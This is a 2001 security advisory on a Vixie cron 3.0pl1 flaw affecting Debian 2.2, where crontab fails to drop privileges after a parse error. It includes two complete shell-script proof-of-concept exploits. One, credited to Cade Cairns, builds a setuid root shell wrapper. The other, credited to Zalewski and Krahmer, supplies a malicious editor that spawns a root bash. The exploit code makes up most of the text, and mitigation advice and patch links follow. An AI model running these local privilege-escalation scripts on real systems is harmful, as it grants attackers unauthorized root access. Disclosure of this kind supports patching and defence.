COMMAND
Vixie
SYSTEMS AFFECTED
Vixie 3.0pl1 (Debian 2.2)
PROBLEM
Cade Cairns found the following. Attached is a simple proof of
concept for the vixie cron vulnerability recently published in
Debian Security Advisory DSA-054-1. The code was written during
SIA analysis of this vulnerability.
The vulnerable version is Paul Vixie's Vixie Cron 3.0pl1. Local
users can cause Vixie crontab to fail to drop privileges when
editing files, which can lead to full system compromise.
Vixie cron is an implementation of the popular UNIX program that
runs user-specified programs at periodic scheduled times. A
serialization error exists in some versions of the crontab file
maintenance program. The vulnerability was introduced in versions
which were patched for a separate vulnerability in the fall of 2000.
When a parsing error occurs after a modification operation,
crontab will fail to drop privileges correctly for subsequent
modification operations. Because the program is installed setuid
root, it may be possible for a local user to gain root privileges.
An attacker with local access must edit their crontab file and
enter a line that causes the parser to fail.
The attacker must then enter 'yes' when prompted as to whether he
or she wishes to attempt to fix the error in the file. This will
cause the editor to be invoked again, but with full privileges.
The attacker could then execute arbitrary commands from the
editor, or overwrite otherwise protected system files.
Cade Cairns wrote proof-of-concept exploit code:
#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# affected versions:
# cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
# note that copies of the program with the patch mentioned above are likely
# to also be vulnerable.
#
# 05/07/01 cairnsc@securityfocus.com

CRONTAB=/usr/bin/crontab

if ! test -x $CRONTAB; then
    echo "** unable to locate crontab executable, exiting"
    exit 1
fi

cat > vcsh.c << EOF
#include <unistd.h>
int main() {
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", NULL);
}
EOF

echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c
if ! test -x $PWD/vcsh; then
    echo "** compilation failed, exiting"
    exit 1
fi

echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
    chown root.root $PWD/vcsh
    chmod 4755 $PWD/vcsh
    rm $PWD/vcboom
else
    touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh

echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"
exit 0
Michal Zalewski posted the proof-of-concept he coded for Sebastian
Krahmer (who discovered this vulnerability) while working on it.
This vulnerability affects Debian, SuSE, and probably a few other
Linuxes as well. It is a perfect example of bad coding, and how
improper fixing of bugs might lead to even more dangerous
conditions. It is fully automated, and we believe it gives
absolutely nothing to the attacker, as this vulnerability can be
exploited by hand in approximately 5 seconds.
#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is> |"
echo "| Michal Zalewski <lcamtuf@coredump.cx> |"
echo "\`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab
echo ">>> Using binary: $CRONBIN"

echo -n ">>> Setuid check: "
if [ -u $CRONBIN ]; then
    echo "PASSED"
else
    echo "FAILED"
    echo
    exit 1
fi

echo -n ">>> Version check: "
QQ=`strings $CRONBIN | grep '43 vixie Exp'`
if [ "$QQ" = "" ]; then
    echo "FAILED"
    echo
    exit 1
else
    echo "PASSED"
fi

echo ">>> Building exploit..."
cat >edit0r.c <<_eof_
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* sleep(), geteuid(), dup2() */
int main(int argc,char* argv[]) {
    sleep(1);
    if (geteuid()) {
        FILE* x=fopen(argv[1],"w");
        fprintf(x,"blah blah blah\n");
        fclose(x);
    } else {
        dup2(1,0);
        dup2(1,2);
        printf("\n>>> Entering rootshell, babe...\n");
        system("touch $HOME/.xploited");
        system("bash");
    }
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c
if [ ! -f edit0r ]; then
    echo ">>> Cannot compile exploit."
    echo
    exit 1
fi

rm -f ~/.xploited
echo ">>> Performing attack..."
( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null
rm -f edit0r

if [ -f ~/.xploited ]; then
    echo
    echo ">>> Thank you."
    rm -f ~/.xploited
    echo
    exit 0
else
    echo
    echo ">>> Apparently I am not able to exploit it, sorry..."
    echo
    exit 1
fi
SOLUTION
Restricting local access to the host may prevent unauthorized
users from exploiting this vulnerability. Restrict access to the
cron facility to trusted users via the /etc/cron.allow and
/etc/cron.deny files (man crontab).
For Paul Vixie Vixie Cron 3.0pl1:
http://security.debian.org/dists/stable/updates/main/binary-alpha/cron_3.0pl1-57.3_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/cron_3.0pl1-57.3_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/cron_3.0pl1-57.3_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/cron_3.0pl1-57.3_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/cron_3.0pl1-57.3_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/cron_3.0pl1-57.3_sparc.deb
It should be noted that this problem is not Paul Vixie's fault;
this crept into Debian (and other Linux distributions) through a
broken patch.